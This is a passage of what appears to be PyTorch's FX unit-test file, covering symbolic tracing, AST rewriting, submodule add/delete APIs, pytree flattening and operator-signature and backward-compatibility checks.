self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
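# Tracing with concrete_args bakes the given value of 'y' into the graph and
# inserts a torch._assert guard, so each specialized module rejects the other
# value at runtime (checked below).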
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
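            # Retracing the already-flattened GraphModule without concrete_args should
            # collapse the inputs back into a single pytree placeholder.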
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'T', # Implemented with a lambda
'H', # Implemented with a lambda
'mT', # Implemented with a lambda
'mH', # Implemented with a lambda
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
